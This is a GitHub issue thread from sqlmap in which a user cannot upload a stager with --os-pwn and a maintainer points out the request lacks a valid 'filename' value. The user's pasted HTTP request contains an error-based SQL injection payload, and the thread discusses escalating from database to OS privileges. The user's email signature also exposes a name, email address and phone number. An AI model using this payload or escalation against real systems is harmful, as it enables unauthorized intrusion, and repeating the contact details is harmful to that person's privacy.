### ISSUE TITLE
Unable to upload stager

### ISSUE THREAD

**Issue by Snipercatz** [sqlmapproject/sqlmap#1125]
I'm having trouble using --os-pwn and am unable to upload a stager. I've done a brute force search and nothing.  I think it has something to do with my request because I'm not sure what my parameter value is.
Here is the HTTP request

POST /search_result.php HTTP/1.1
Content-Length: 392
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3kicdmi6qnm14i9lnvsea6kpi5
Host: 
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

filename='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(109)%2cCHAR(106)%2cCHAR(117)%2cCHAR(53)%2cCHAR(83)%2cCHAR(88)%2cCHAR(49)%2cCHAR(99))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&keyword=1&oper=OR&search_mode=1&SubmitAdv=%a4%e9%b9%cb%d2...

Decoded the data looks like this: 

and(select%201%20from(select%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(109)%2cCHAR(106)%2cCHAR(117)%2cCHAR(53)%2cCHAR(83)%2cCHAR(88)%2cCHAR(49)%2cCHAR(99))%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&keyword=1&oper=OR&search_mode=1&SubmitAdv=%a4%e9%b9%cb%d2... <-huh?

So wouldn't the HTTP request look like this? 

POST /search_result.php HTTP/1.1
Content-Length: 392
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3kicdmi6qnm14i9lnvsea6kpi5
Host: 
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

filename=*

I have admin privileges and am running Kali Linux

Thx

**Comment by stamparm** [comment]
sqlmap likes valid data. SQL injection likes valid data. That first request of yours is s*itty.

you should have a valid value for parameter `filename` inside request data.

p.s. `admin` privileges doesn't mean anything if it's only on DBMS. `admin` on DBMS is not the same as `root/Administrator` on OS.

**Comment by Snipercatz** [comment]
I know my request is shit*y. That's what my point was.  That was the
request Acunetix provided me with, that's the injection point it provided,
the original value is not provided. But I figured that part out anyway and
was able to find a valid data parameter.

I should have specified I am root@localhost so I am the OS admin.

Thx

On Tue, Jan 20, 2015 at 5:24 AM, Miroslav Stampar <notifications@github.com>
wrote:

> sqlmap likes valid data. SQL injection likes valid data. That first
> request of yours is s*itty.
>
> you should have a valid value for parameter filename inside request data.
>
> p.s. admin privileges doesn't mean anything if it's only on DBMS. admin
> on DBMS is not the same as root/Administrator on OS.
>
> —
> Reply to this email directly or view it on GitHub
> <https://github.com/sqlmapproject/sqlmap/issues/1125#issuecomment-70645895>
> .
>



-- 
*Emily Ann*
*emilyanncr@gmail.com <emilyanncr@gmail.com>*

*480-862-4401*
